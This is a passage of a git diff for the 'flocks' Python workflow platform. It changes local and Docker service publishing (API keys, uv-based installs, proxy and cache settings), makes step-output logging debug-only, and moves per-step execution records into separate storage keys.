+            sys.executable,
+            "-m", "flocks.workflow.service_runtime",
+            "--workflow", str(release_snapshot_file),
+            "--workflow-id", workflow_id,
+            "--release-id", release_id,
+            "--host", "127.0.0.1",
+            "--port", str(host_port),
+            stdout=asyncio.subprocess.DEVNULL,
+            stderr=asyncio.subprocess.DEVNULL,
+            env=env,
+            start_new_session=True,
+        )
 
-    await Storage.write(_local_pid_key(workflow_id), {
-        "pid": proc.pid,
-        "processGroupId": proc.pid,
-        "port": host_port,
-    })
+        await Storage.write(_local_pid_key(workflow_id), {
+            "pid": proc.pid,
+            "processGroupId": proc.pid,
+            "port": host_port,
+        })
 
-    health_retries = int(os.getenv("FLOCKS_WORKFLOW_SERVICE_HEALTH_RETRIES", str(_DEFAULT_HEALTH_RETRIES)))
-    health_interval_s = float(os.getenv("FLOCKS_WORKFLOW_SERVICE_HEALTH_INTERVAL_S", str(_DEFAULT_HEALTH_INTERVAL_S)))
+        health_retries = int(os.getenv("FLOCKS_WORKFLOW_SERVICE_HEALTH_RETRIES", str(_DEFAULT_HEALTH_RETRIES)))
+        health_interval_s = float(os.getenv("FLOCKS_WORKFLOW_SERVICE_HEALTH_INTERVAL_S", str(_DEFAULT_HEALTH_INTERVAL_S)))
 
-    healthy = await _wait_service_healthy(service_url, retries=health_retries, interval_s=health_interval_s)
-    if not healthy:
-        try:
-            await _stop_local_service(workflow_id)
-        except Exception:
-            pass
+        healthy = await _wait_service_healthy(service_url, retries=health_retries, interval_s=health_interval_s)
+        if not healthy:
+            try:
+                await _stop_local_service(workflow_id)
+            except Exception:
+                pass
+            raise WorkflowCenterError("Local workflow service failed health check")
+
+        active_record = {
+            "releaseId": release_id,
+            "workflowId": workflow_id,
+            "serviceKey": service_key,
+            "containerName": f"local-{workflow_id[:8]}-{release_id[:8]}",
+            "containerId": str(proc.pid),
+            "processGroupId": proc.pid,
+            "image": "local",
+            "hostPort": host_port,
+            "serviceUrl": service_url,
+            "status": "active",
+            "updatedAt": _now_ms(),
+            "driver": "local",
+            "apiKey": runtime_api_key,
+        }
+        await Storage.write(_active_release_key(workflow_id), active_record)
+        await Storage.write(_runtime_key(workflow_id), active_record)
+        _release_port_reservation(host_port)
+    except Exception as exc:
+        _release_port_reservation(host_port)
+        if proc is not None:
+            try:
+                _signal_local_process(proc.pid, signal.SIGTERM, proc.pid)
+                await _wait_for_pid_exit(proc.pid, 1.0)
+            except Exception:
+                pass
         registry["publishStatus"] = "failed"
         registry["updatedAt"] = _now_ms()
         await Storage.write(_registry_key(workflow_id), registry)
-        raise WorkflowCenterError("Local workflow service failed health check")
-
-    active_record = {
-        "releaseId": release_id,
-        "workflowId": workflow_id,
-        "serviceKey": service_key,
-        "containerName": f"local-{workflow_id[:8]}-{release_id[:8]}",
-        "containerId": str(proc.pid),
-        "processGroupId": proc.pid,
-        "image": "local",
-        "hostPort": host_port,
-        "serviceUrl": service_url,
-        "status": "active",
-        "updatedAt": _now_ms(),
-        "driver": "local",
-    }
-    await Storage.write(_active_release_key(workflow_id), active_record)
-    await Storage.write(_runtime_key(workflow_id), active_record)
+        if isinstance(exc, WorkflowCenterError):
+            raise
+        raise WorkflowCenterError(str(exc)) from exc
 
     registry["publishStatus"] = "active"
     registry["activeReleaseId"] = release_id
@@ -669,14 +882,15 @@ async def publish_workflow(
     workflow_id: str,
     image: Optional[str] = None,
     driver: Optional[str] = None,
+    api_key: Optional[str] = None,
 ) -> Dict[str, Any]:
     """Publish a workflow using the configured service driver (local or docker)."""
     resolved_driver = (driver or _service_driver()).strip().lower()
     if resolved_driver == "docker":
-        return await _publish_workflow_docker(workflow_id, image=image)
+        return await _publish_workflow_docker(workflow_id, image=image, api_key=api_key)
     if resolved_driver != "local":
         raise WorkflowCenterError(f"Unsupported workflow service driver: {resolved_driver}")
-    return await publish_workflow_local(workflow_id)
+    return await publish_workflow_local(workflow_id, api_key=api_key)
 
 
 async def stop_workflow_service(workflow_id: str) -> Dict[str, Any]:
@@ -692,7 +906,12 @@ async def stop_workflow_service(workflow_id: str) -> Dict[str, Any]:
     return await stop_local_service(workflow_id)
 
 
-async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None) -> Dict[str, Any]:
+async def _publish_workflow_docker(
+    workflow_id: str,
+    image: Optional[str] = None,
+    *,
+    api_key: Optional[str] = None,
+) -> Dict[str, Any]:
     """Publish a registered workflow as a Docker service container."""
     registry = await _read_registry(workflow_id)
     workflow_path = Path(str(registry["workflowPath"]))
@@ -748,7 +967,10 @@ async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None
     )
     project_root = Path.cwd().resolve()
     user_config_dir = Config.get_config_path().resolve()
+    pip_cache_dir = _service_cache_dir("pip")
+    uv_cache_dir = _service_cache_dir("uv")
     service_key = workflow_id
+    runtime_api_key = api_key or _generate_api_key()
 
     cmd = [
         "run",
@@ -761,6 +983,10 @@ async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None
         f"{project_root}:/app:ro",
         "-v",
         f"{release_runtime_dir}:/runtime",
+        "-v",
+        f"{pip_cache_dir}:/root/.cache/pip",
+        "-v",
+        f"{uv_cache_dir}:/root/.cache/uv",
         "-w",
         "/runtime",
         "-e",
@@ -769,6 +995,10 @@ async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None
         "FLOCKS_CONFIG_DIR=/runtime/.flocks-config",
         "-e",
         "FLOCKS_CONFIG=/runtime/.flocks-config/flocks.json",
+        "-e",
+        f"{_SERVICE_API_KEY_ENV}={runtime_api_key}",
+        "-e",
+        "UV_CACHE_DIR=/root/.cache/uv",
         image_name,
     ]
     if user_config_dir.exists():
@@ -788,22 +1018,41 @@ async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None
         "no_proxy",
     ]
     proxy_injections: List[str] = []
+    needs_host_gateway = False
     for env_name in proxy_env_names:
         env_value = os.getenv(env_name)
         if env_value:
-            proxy_injections.extend(["-e", f"{env_name}={env_value}"])
+            docker_env_value = _docker_proxy_env_value(env_value)
+            if _docker_proxy_uses_host_gateway(docker_env_value):
+                needs_host_gateway = True
+            proxy_injections.extend(["-e", f"{env_name}={docker_env_value}"])
     if proxy_injections:
+        if needs_host_gateway:
+            cmd[cmd.index(image_name):cmd.index(image_name)] = [
+                "--add-host",
+                "host.docker.internal:host-gateway",
+            ]
         cmd[cmd.index(image_name):cmd.index(image_name)] = proxy_injections
+    python_index_url = resolve_python_package_index_url()
+    if python_index_url:
+        cmd[cmd.index(image_name):cmd.index(image_name)] = [
+            "-e",
+            f"PIP_INDEX_URL={python_index_url}",
+            "-e",
+            f"UV_DEFAULT_INDEX={python_index_url}",
+        ]
     if runtime_install:
+        uv_bootstrap_cmd = "python -m pip install uv"
         if has_requirements_snapshot:
             # Pre-install all pinned deps from requirements.txt (no resolver = fast),
             # then install the project itself without re-resolving deps.
             install_cmd = (
-                "pip install --no-cache-dir -r /runtime/requirements.txt && "
-                "pip install --no-cache-dir --no-deps /app"
+                f"{uv_bootstrap_cmd} && "
+                "uv pip install --system -r /runtime/requirements.txt && "
+                "uv pip install --system --no-deps /app"
             )
         else:
-            install_cmd = "pip install --no-cache-dir /app"
+            install_cmd = f"{uv_bootstrap_cmd} && uv pip install --system /app"
         service_cmd = (
             f"{install_cmd} && "
             "python -m flocks.workflow.service_runtime "
@@ -837,8 +1086,9 @@ async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None
         stdout, _, _ = await exec_docker(cmd)
         container_id = stdout.strip()
         service_url = _host_service_url(host_port)
-        healthy = await _wait_service_healthy(
+        healthy = await _wait_docker_service_healthy(
             service_url,
+            container_name,
             retries=health_retries,
             interval_s=health_interval_s,
         )
@@ -861,9 +1111,11 @@ async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None
             "status": "active",
             "updatedAt": _now_ms(),
             "driver": "docker",
+            "apiKey": runtime_api_key,
         }
         await Storage.write(_active_release_key(workflow_id), active_record)
         await Storage.write(_runtime_key(workflow_id), active_record)
+        _release_port_reservation(host_port)
 
         registry["publishStatus"] = "active"
         registry["activeReleaseId"] = release_id
@@ -886,6 +1138,7 @@ async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None
 
         return active_record
     except Exception as exc:
+        _release_port_reservation(host_port)
         await _stop_and_remove_container(container_name)
         release_record["status"] = "failed"
         release_record["deactivatedAt"] = _now_ms()
@@ -1015,7 +1268,13 @@ async def invoke_published_workflow(
         payload["timeout_s"] = timeout_s
 
     try:
-        result = await asyncio.to_thread(_json_post, f"{service_url}/invoke", payload, timeout_s or 30.0)
+        result = await asyncio.to_thread(
+            _json_post,
+            f"{service_url}/invoke",
+            payload,
+            timeout_s or 30.0,
+            _workflow_service_auth_headers(runtime),
+        )
         result.setdefault("workflowId", workflow_id)
         result.setdefault("releaseId", runtime.get("releaseId"))
         return result
diff --git a/flocks/workflow/engine.py b/flocks/workflow/engine.py
index b47fb2303..60c86ea98 100644
--- a/flocks/workflow/engine.py
+++ b/flocks/workflow/engine.py
@@ -144,7 +144,7 @@ class WorkflowEngine:
     mutate_workflow: bool = False
     workflow_path: Optional[str] = None
     node_timeout_s: Optional[float] = 300.0
-    history_mode: Literal["full", "summary"] = "full"
+    history_mode: Literal["full", "summary"] = "summary"
     _depth: int = 0
     max_parallel_workers: int = 4
     workflow_loader: Optional[Callable[[str], "Workflow"]] = field(default=None, repr=False)
@@ -193,6 +193,7 @@ def run(
         cancel: Optional[Callable[[], bool]] = None,
         on_step_start: Optional[StepStartHook[Any]] = None,
         on_step_end: Optional[StepEndHook[Any]] = None,
+        retain_history: bool = False,
     ) -> ExecutionResult:
         assert self.runtime is not None
         nodes = self.workflow.nodes_by_id()
@@ -224,6 +225,10 @@ def run(
             previous_cancel_checker = self.runtime.cancel_checker
             self.runtime.cancel_checker = cancel
         try:
+            def _retain_step(step: StepResult) -> None:
+                if retain_history:
+                    history.append(step)
+
             def _build_execution_context() -> Dict[str, Any]:
                 return {
                     "run_id": rid,
@@ -499,7 +504,7 @@ def _build_step_result(
                             error=_eo.error or "Run cancelled",
                             traceback_text=_eo.traceback,
                         )
-                        history.append(step_res)
+                        _retain_step(step_res)
                         if on_step_end is not None and _eo.idx in step_tokens:
                             try:
                                 on_step_end(step_tokens[_eo.idx], step_res)
@@ -525,7 +530,7 @@ def _build_step_result(
                             error=_eo.error,
                             traceback_text=_eo.traceback,
                         )
-                        history.append(step_res)
+                        _retain_step(step_res)
                         _status = "timeout" if _eo.is_timeout else "error"
                         (_logger.warning if _eo.is_timeout else _logger.error)(
                             f"wf.step.{_status}",
@@ -535,17 +540,29 @@ def _build_step_result(
                                 **({"timeout_s": self.node_timeout_s} if _eo.is_timeout else {"traceback": (_eo.traceback or "")[:500]}),
                             },
                         )
+                        outputs_keys = list(_eo.outputs.keys())
                         _logger.info(
-                            "wf.step.end step=%s node=%s type=%s status=%s duration_ms=%.3f outputs=%s error=%s",
-                            _sn, _nid, _nd.type, _status, _eo.duration_ms,
-                            _outputs_for_log(_eo.outputs), _eo.error,
+                            "wf.step.end step=%s node=%s type=%s status=%s duration_ms=%.3f outputs_keys=%s",
+                            _sn, _nid, _nd.type, _status, _eo.duration_ms, outputs_keys,
                             extra={
                                 "run_id": rid, "step": _sn, "node_id": _nid,
                                 "node_type": _nd.type, "status": _status,
-                                "duration_ms": _eo.duration_ms, "outputs_keys": list(_eo.outputs.keys()),
-                                "outputs": _outputs_for_log(_eo.outputs), "error": _eo.error,
+                                "duration_ms": _eo.duration_ms, "outputs_keys": outputs_keys,
+                                "error": _eo.error,
                             },
                         )
+                        if _logger.isEnabledFor(logging.DEBUG):
+                            outputs_for_debug = _outputs_for_log(_eo.outputs)
+                            _logger.debug(
+                                "wf.step.outputs step=%s node=%s status=%s outputs=%s",
+                                _sn, _nid, _status, outputs_for_debug,
+                                extra={
+                                    "run_id": rid, "step": _sn, "node_id": _nid,
+                                    "node_type": _nd.type, "status": _status,
+                                    "outputs": outputs_for_debug,
+                                    "error": _eo.error,
+                                },
+                            )
                         if on_step_end is not None and _eo.idx in step_tokens:
                             try:
                                 on_step_end(step_tokens[_eo.idx], step_res)
@@ -562,6 +579,7 @@ def _build_step_result(
                                     "run_id": rid,
                                     "steps": step_count + len(exec_results),
                                     "last_node_id": _nid,
+                                    "outputs": last_outputs,
                                     "history": history,
                                 },
                             )
@@ -580,17 +598,30 @@ def _build_step_result(
                             stdout=_eo.stdout,
                             error=None,
                         )
-                        history.append(step_res)
+                        _retain_step(step_res)
+                        outputs_keys = list(_eo.outputs.keys())
                         _logger.info(
-                            "wf.step.end step=%s node=%s type=%s status=%s duration_ms=%.3f outputs=%s",
-                            _sn, _nid, _nd.type, "ok", _eo.duration_ms, _outputs_for_log(_eo.outputs),
+                            "wf.step.end step=%s node=%s type=%s status=%s duration_ms=%.3f outputs_keys=%s",
+                            _sn, _nid, _nd.type, "ok", _eo.duration_ms, outputs_keys,
                             extra={
                                 "run_id": rid, "step": _sn, "node_id": _nid,
                                 "node_type": _nd.type, "status": "ok",
-                                "duration_ms": _eo.duration_ms, "outputs_keys": list(_eo.outputs.keys()),
-                                "outputs": _outputs_for_log(_eo.outputs), "error": None,
+                                "duration_ms": _eo.duration_ms, "outputs_keys": outputs_keys,
+                                "error": None,
                             },
                         )
+                        if _logger.isEnabledFor(logging.DEBUG):
+                            outputs_for_debug = _outputs_for_log(_eo.outputs)
+                            _logger.debug(
+                                "wf.step.outputs step=%s node=%s status=%s outputs=%s",
+                                _sn, _nid, "ok", outputs_for_debug,
+                                extra={
+                                    "run_id": rid, "step": _sn, "node_id": _nid,
+                                    "node_type": _nd.type, "status": "ok",
+                                    "outputs": outputs_for_debug,
+                                    "error": None,
+                                },
+                            )
                         if on_step_end is not None and _eo.idx in step_tokens:
                             try:
                                 on_step_end(step_tokens[_eo.idx], step_res)
@@ -877,7 +908,7 @@ def _execute_subworkflow_node(
             workflow_loader=self.workflow_loader,
         )
         result = sub_engine.run(initial_inputs=sub_inputs)
-        last_outputs = result.history[-1].outputs if result.history else {}
+        last_outputs = result.outputs or (result.history[-1].outputs if result.history else {})
         output_k = node.output_key or "output"
         return {output_k: last_outputs}, ""
 
diff --git a/flocks/workflow/execution_store.py b/flocks/workflow/execution_store.py
index 8bc6b3309..98ada8c44 100644
--- a/flocks/workflow/execution_store.py
+++ b/flocks/workflow/execution_store.py
@@ -6,7 +6,7 @@
 import re
 import time
 import uuid
-from typing import Any, Dict, Iterable, List, Optional, Set
+from typing import Any, Callable, Dict, Iterable, List, Optional, Set, Tuple
 
 from flocks.session.recorder import Recorder
 from flocks.storage.storage import Storage
@@ -82,6 +82,8 @@ def compact_step_for_storage(
     size_threshold: int = DEFAULT_COMPACT_SIZE_THRESHOLD,
 ) -> Any:
     """Return a copy of one history step with large ``inputs``/``outputs`` compacted."""
+    if not isinstance(step, dict) and hasattr(step, "model_dump"):
+        step = step.model_dump(mode="json")
     if not isinstance(step, dict):
         return step
     step_copy = dict(step)
@@ -113,6 +115,90 @@ def compact_history_for_storage(
         for step in history
     ]
 
+
+def _first_value(data: Dict[str, Any], keys: Iterable[str]) -> Any:
+    """Return the first value found under ``keys`` that is neither ``None`` nor ``""``."""
+    looked_up = (data.get(name) for name in keys)
+    # Only None and "" count as missing; falsy values such as 0 or False are returned.
+    present = (found for found in looked_up if found not in (None, ""))
+    return next(present, None)
+
+
+def _as_positive_int(value: Any) -> Optional[int]:
+    """Coerce ``value`` to an int greater than zero; return ``None`` if it is not one."""
+    # bool is an int subclass, so it must be rejected before the numeric branches.
+    if isinstance(value, bool) or not isinstance(value, (int, float, str)):
+        return None
+    if isinstance(value, float):
+        return int(value) if value > 0 and value.is_integer() else None
+    number = value
+    if isinstance(value, str):
+        try:
+            number = int(value)
+        except ValueError:
+            return None
+    return number if number > 0 else None
+
+
+def derive_loop_progress(
+    *,
+    node_id: Optional[str],
+    global_step_index: int,
+    inputs: Optional[Dict[str, Any]] = None,
+    outputs: Optional[Dict[str, Any]] = None,
+) -> Optional[Dict[str, Any]]:
+    """Build a best-effort loop snapshot from counter-like step fields.
+
+    Workflows tend to carry loop state in ordinary inputs/outputs (for
+    example ``iteration``/``total_iterations``/``current_item``), so the
+    snapshot is inferred from those values.
+
+    ``inputs`` and ``outputs`` are merged with outputs winning on key
+    clashes.  Returns ``None`` when no iteration, total or current item can
+    be found; otherwise a dict that also echoes ``node_id`` (as
+    ``current_inner_node_id``) and ``global_step_index``.
+    """
+    iteration_keys = (
+        "iteration", "loop_index", "current_index", "item_idx", "item_index", "host_idx",
+    )
+    total_keys = (
+        "total_iterations", "total_items", "item_count", "items_count",
+        "total_hosts", "host_count", "hosts_count", "hosts_total",
+    )
+    item_keys = (
+        "current_item", "item", "current_host", "last_host",
+        "host", "ssh_target", "last_ssh_target",
+    )
+
+    # Later sources override earlier ones, so outputs take precedence.
+    merged: Dict[str, Any] = {}
+    for source in (inputs, outputs):
+        if isinstance(source, dict):
+            merged.update(source)
+
+    # Only strictly positive integers are accepted for the two counters.
+    iteration = _as_positive_int(_first_value(merged, iteration_keys))
+    total = _as_positive_int(_first_value(merged, total_keys))
+    current_item = _first_value(merged, item_keys)
+
+    # Without a usable explicit total, fall back to the size of a ``hosts`` list.
+    if total is None and isinstance(merged.get("hosts"), list):
+        total = len(merged["hosts"])
+
+    # Nothing loop-related was found at all.
+    if all(part is None for part in (iteration, total, current_item)):
+        return None
+
+    progress: Dict[str, Any] = {
+        "loop_node_id": merged.get("loop_node_id") or merged.get("loop_id"),
+        "iteration": iteration,
+        "total_iterations": total,
+        "current_item": current_item,
+        "current_inner_node_id": node_id,
+        "global_step_index": global_step_index,
+    }
+    return progress
+
 # Maximum number of execution history records retained per workflow.
 # Keep this intentionally small so high-frequency workflows do not keep
 # inflating the SQLite row set and matching JSONL audit files indefinitely.
@@ -194,6 +280,139 @@ def workflow_execution_key(exec_id: str) -> str:
     return f"workflow_execution/{exec_id}"
 
 
+def workflow_execution_step_key(exec_id: str, step_index: int) -> str:
+    """Build the storage key of one execution step; the index is zero-padded to 8 digits."""
+    return "workflow_execution_step/{}/{:08d}".format(exec_id, step_index)
+
+
+def workflow_execution_step_prefix(exec_id: str) -> str:
+    """Build the key prefix shared by every stored step of the execution ``exec_id``."""
+    return "workflow_execution_step/{}/".format(exec_id)
+
+
+def compact_execution_summary(exec_data: Dict[str, Any]) -> Dict[str, Any]:
+    """Return a shallow copy of ``exec_data`` whose ``executionLog`` is empty.
+
+    Per-step details live under separate ``workflow_execution_step`` keys, so
+    the summary row stays small and is not rewritten as an ever-growing JSON
+    blob on each progress update.  The caller's dict is left untouched.
+    """
+    # A later key in the literal replaces the copied one without moving it.
+    trimmed: Dict[str, Any] = {**exec_data, "executionLog": []}
+    return trimmed
+
+
+async def record_execution_step(exec_id: str, step_index: int, step: Dict[str, Any]) -> Dict[str, Any]:
+    """Write one compacted step under its own storage key.
+
+    Returns the compacted payload that was handed to ``Storage.write``.
+    """
+    compacted = compact_step_for_storage(step)
+    storage_key = workflow_execution_step_key(exec_id, step_index)
+    await Storage.write(storage_key, compacted)
+    return compacted
+
+
+class ExecutionStepRecorder:
+    """Adapter that turns synchronous step callbacks into per-step storage writes.
+
+    ``step_count`` counts recorded steps; ``summary`` holds the latest progress fields.
+    """
+
+    def __init__(
+        self,
+        *,
+        exec_id: str,
+        loop: asyncio.AbstractEventLoop,
+        logger: Any = None,
+        log_event: str = "workflow.execution_step.write_failed",
+        step_compactor: Callable[[Any], Dict[str, Any]] = compact_step_for_storage,
+        write_timeout_s: float = 5.0,
+    ) -> None:
+        self.exec_id = exec_id
+        self.loop = loop
+        self.logger = logger or log
+        self.log_event = log_event
+        self.step_compactor = step_compactor
+        self.write_timeout_s = write_timeout_s
+        self.step_count = 0
+        self.summary: Dict[str, Any] = {}
+
+    def on_step_complete(self, step_result: Any) -> None:
+        """Record one finished step; a failed or timed-out write is logged, not raised."""
+        if hasattr(step_result, "model_dump"):
+            step_result = step_result.model_dump(mode="json")
+        step_dict = self.step_compactor(step_result)
+        if not isinstance(step_dict, dict):
+            return
+
+        self.step_count += 1
+        index, node_id = self.step_count, step_dict.get("node_id")
+        self.summary.update({
+            "stepCount": index,
+            "currentNodeId": node_id,
+            "currentNodeType": step_dict.get("node_type") or step_dict.get("type"),
+            "currentPhase": "running",
+            "currentStepIndex": index,
+            "loopProgress": derive_loop_progress(
+                node_id=node_id, global_step_index=index,
+                inputs=step_dict.get("inputs"), outputs=step_dict.get("outputs"),
+            ),
+            "updatedAt": int(time.time() * 1000),
+        })
+        try:
+            pending = asyncio.run_coroutine_threadsafe(
+                record_execution_step(self.exec_id, index, step_dict), self.loop,
+            )
+            pending.result(timeout=self.write_timeout_s)
+        except Exception as exc:
+            failure = {"exec_id": self.exec_id, "step_index": index, "error": str(exc)}
+            self.logger.warning(self.log_event, failure)
+
+
+async def _backfill_execution_steps(
+    exec_id: str,
+    execution_log: Any,
+) -> int:
+    """Write each entry of a legacy inline ``executionLog`` as its own step row.
+
+    Non-dict payloads and failed writes (which are logged) do not count toward the returned total.
+    """
+    if not isinstance(execution_log, list):
+        return 0
+
+    stored = 0
+    for position, entry in enumerate(execution_log, start=1):
+        payload = compact_step_for_storage(entry)
+        if isinstance(payload, dict):
+            try:
+                await Storage.write(workflow_execution_step_key(exec_id, position), payload)
+            except Exception as exc:
+                details = {"exec_id": exec_id, "step_index": position, "error": str(exc)}
+                log.warning("workflow.execution_step.backfill_failed", details)
+            else:
+                stored += 1
+    return stored
+
+
+async def load_execution_steps(
+    exec_id: str,
+    *,
+    offset: int = 0,
+    limit: Optional[int] = None,
+) -> Tuple[List[Dict[str, Any]], int]:
+    """Return one page of stored step dicts for ``exec_id`` plus the reported total.
+
+    ``limit=None`` means a page of 500; negative ``offset``/``limit`` are clamped to 0.
+    """
+    effective_limit = max(limit, 0) if limit is not None else 500
+    prefix = workflow_execution_step_prefix(exec_id)
+    page, total = await Storage.list_entries_page(prefix, offset=max(offset, 0), limit=effective_limit)
+    # Non-dict entries are dropped from the page; ``total`` is passed through as reported.
+    steps = [entry for _key, entry in page if isinstance(entry, dict)]
+    return steps, total
+
+
 def normalize_execution_status(status: str) -> str:
     """Map runner status values to API status values."""
     normalized = (status or "").strip().upper()
@@ -276,7 +495,7 @@ async def create_execution_record(
         input_params=compacted_params,
         exec_id=exec_id,
     )
-    await Storage.write(workflow_execution_key(exec_data["id"]), exec_data)
+    await Storage.write(workflow_execution_key(exec_data["id"]), compact_execution_summary(exec_data))
     return exec_data
 
 
@@ -286,16 +505,22 @@ async def record_execution_result(
     exec_data: Dict[str, Any],
 ) -> None:
     """Persist the final execution record, audit trail, and workflow stats."""
-    await Storage.write(workflow_execution_key(exec_id), exec_data)
+    summary_data = dict(exec_data)
+    backfilled_steps = await _backfill_execution_steps(exec_id, summary_data.get("executionLog"))
+    existing_step_count = _as_positive_int(summary_data.get("stepCount"))
+    if backfilled_steps and (existing_step_count is None or existing_step_count < backfilled_steps):
+        summary_data["stepCount"] = backfilled_steps
+
+    await Storage.write(workflow_execution_key(exec_id), compact_execution_summary(summary_data))
 
     # Update call/success/error counters so all trigger paths (HTTP, syslog, etc.)
     # are reflected in the UI stats panel.
-    status = exec_data.get("status", "error")
+    status = summary_data.get("status", "error")
     success = status == "success"
-    duration = exec_data.get("duration")
+    duration = summary_data.get("duration")
     if not isinstance(duration, (int, float)):
-        started_at = exec_data.get("startedAt", 0)
-        finished_at = exec_data.get("finishedAt", int(time.time() * 1000))
+        started_at = summary_data.get("startedAt", 0)
+        finished_at = summary_data.get("finishedAt", int(time.time() * 1000))
         duration = max(0.0, (finished_at - started_at) / 1000.0)
     await _update_workflow_stats(workflow_id, success, float(duration))
 
@@ -395,6 +620,9 @@ async def _trim_execution_history(workflow_id: str) -> None:
             try:
                 exec_id = key.rsplit("/", 1)[-1]
                 await Storage.remove(key)
+                step_rows = await Storage.list_raw(workflow_execution_step_prefix(exec_id))
+                for step_key, _value in step_rows:
+                    await Storage.remove(step_key)
                 record_path = Recorder.paths().workflow_dir / f"{exec_id}.jsonl"
                 await asyncio.to_thread(record_path.unlink, missing_ok=True)
             except Exception:
diff --git a/flocks/workflow/fs_store.py b/flocks/workflow/fs_store.py
index 366119faa..8f1900268 100644
--- a/flocks/workflow/fs_store.py
+++ b/flocks/workflow/fs_store.py
@@ -14,6 +14,68 @@
 log = Log.create(service="workflow.fs-store")
 
 _workspace_root: Optional[Path] = None
+_EMPTY_DRAFT_WORKFLOW_JSON: Dict[str, Any] = {  # placeholder workflow JSON used when a directory has markdown but no workflow.json
+    "start": "",
+    "nodes": [],  # NOTE(review): a shallow dict() copy of this template shares this list - avoid in-place mutation
+    "edges": [],  # NOTE(review): same sharing caveat as "nodes"
+}
+
+
+def _markdown_title(markdown_content: Optional[str], fallback: str) -> str:
+    """Return the text of the first non-empty ``# `` heading, or ``fallback`` if there is none."""
+    # ``or ""`` lets None/empty content fall straight through to the fallback.
+    headings = (
+        row.strip()[2:].strip()
+        for row in (markdown_content or "").splitlines()
+        if row.strip().startswith("# ")
+    )
+    first_title = next((heading for heading in headings if heading), None)
+    return fallback if first_title is None else first_title
+
+
+def _coerce_localized_names(value: Any) -> Dict[str, str]:
+    """Normalise a ``{locale: name}`` mapping to stripped, non-empty string pairs."""
+    if not isinstance(value, dict):
+        return {}
+    # None names become "" so they are filtered out together with blank strings.
+    cleaned = (
+        (str(locale).strip(), "" if label is None else str(label).strip())
+        for locale, label in value.items()
+    )
+    return {locale: label for locale, label in cleaned if locale and label}
+
+
+def _localized_names_from_mapping(value: Any) -> Dict[str, str]:
+    """Collect locale -> name pairs from one mapping: nested name maps are merged in
+    order, then flat alias keys fill only the locales that are still unset."""
+    if not isinstance(value, dict):
+        return {}
+    collected: Dict[str, str] = {}
+    for container_key in ("nameI18n", "names", "localizedNames", "displayNames"):
+        collected.update(_coerce_localized_names(value.get(container_key)))
+    alias_table = (
+        ("zh-CN", ("nameZh", "nameCn", "zhName", "cnName")),
+        ("en-US", ("nameEn", "enName")),
+    )
+    for locale, aliases in alias_table:
+        texts = (value.get(alias) for alias in aliases)
+        # The first alias holding a non-blank string wins for its locale.
+        hit = next((text.strip() for text in texts if isinstance(text, str) and text.strip()), None)
+        if hit is not None:
+            collected.setdefault(locale, hit)
+    return collected
+
+
+def _workflow_name_i18n(workflow_json: Dict[str, Any], meta: Dict[str, Any]) -> Dict[str, str]:
+    """Merge localized names from the workflow JSON, its ``metadata`` block, then ``meta``.
+
+    Sources are applied in that order, so a later source overrides an earlier one.
+    """
+    merged: Dict[str, str] = {}
+    # A non-dict ``metadata`` contributes nothing, exactly like a missing one.
+    for mapping in (workflow_json, workflow_json.get("metadata"), meta):
+        merged.update(_localized_names_from_mapping(mapping))
+    return merged
 
 
 def _is_cached_workspace_root_valid(current: Path, cached_root: Path) -> bool:
@@ -57,33 +119,48 @@ def read_workflow_dir(
 ) -> Optional[Dict[str, Any]]:
     """Read a single workflow directory and return metadata plus JSON."""
     json_file = wf_dir / "workflow.json"
-    if not json_file.is_file():
+    md_file = wf_dir / "workflow.md"
+    legacy_edit_md_file = wf_dir / "workflow.edit.md"
+    has_markdown = md_file.is_file() or legacy_edit_md_file.is_file()
+    if not json_file.is_file() and not has_markdown:
         return None
 
     try:
-        workflow_json = json.loads(json_file.read_text(encoding="utf-8"))
-        json_mtime_ms = int(json_file.stat().st_mtime * 1000)
+        if json_file.is_file():
+            workflow_json = json.loads(json_file.read_text(encoding="utf-8"))
+            json_mtime_ms = int(json_file.stat().st_mtime * 1000)
+        else:
+            workflow_json = dict(_EMPTY_DRAFT_WORKFLOW_JSON)
+            json_mtime_ms = 0
+
+        markdown_content: Optional[str] = None
+        updated_candidates = [json_mtime_ms]
+        if md_file.is_file():
+            markdown_content = md_file.read_text(encoding="utf-8")
+            updated_candidates.append(int(md_file.stat().st_mtime * 1000))
+        elif legacy_edit_md_file.is_file():
+            markdown_content = legacy_edit_md_file.read_text(encoding="utf-8")
+            updated_candidates.append(int(legacy_edit_md_file.stat().st_mtime * 1000))
 
         meta_file = wf_dir / "meta.json"
         if meta_file.is_file():
             meta = json.loads(meta_file.read_text(encoding="utf-8"))
         else:
+            fallback_updated = max(updated_candidates)
             meta = {
-                "name": workflow_json.get("name", workflow_id),
+                "name": workflow_json.get("name") or _markdown_title(markdown_content, workflow_id),
                 "description": workflow_json.get("description"),
                 "category": workflow_json.get("category", "default"),
-                "status": "active",
+                "status": "active" if json_file.is_file() else "draft",
                 "createdBy": None,
-                "createdAt": json_mtime_ms,
-                "updatedAt": json_mtime_ms,
+                "createdAt": fallback_updated,
+                "updatedAt": fallback_updated,
             }
 
-        md_file = wf_dir / "workflow.md"
-        markdown_content: Optional[str] = None
-        updated_candidates = [json_mtime_ms]
-        if md_file.is_file():
-            markdown_content = md_file.read_text(encoding="utf-8")
-            updated_candidates.append(int(md_file.stat().st_mtime * 1000))
+        name_i18n = _workflow_name_i18n(workflow_json, meta)
+        if name_i18n:
+            meta["nameI18n"] = name_i18n
+
         if meta_file.is_file():
             updated_candidates.append(int(meta_file.stat().st_mtime * 1000))
             updated_candidates.append(int(meta.get("updatedAt") or 0))
@@ -95,6 +172,7 @@ def read_workflow_dir(
             "source": source,
             "workflowJson": workflow_json,
             "markdownContent": markdown_content,
+            "editMarkdownContent": markdown_content,
         }
     except Exception as exc:
         log.warning(
@@ -154,7 +232,7 @@ def resolve_workflow_id_from_source(workflow: Any) -> Optional[str]:
         except ValueError:
             continue
         parts = relative.parts
-        if len(parts) == 2 and parts[1] == "workflow.json":
+        if len(parts) == 2 and parts[1] in {"workflow.json", "workflow.md", "workflow.edit.md"}:
             workflow_id = parts[0]
             if read_workflow_from_fs(workflow_id) is not None:
                 return workflow_id
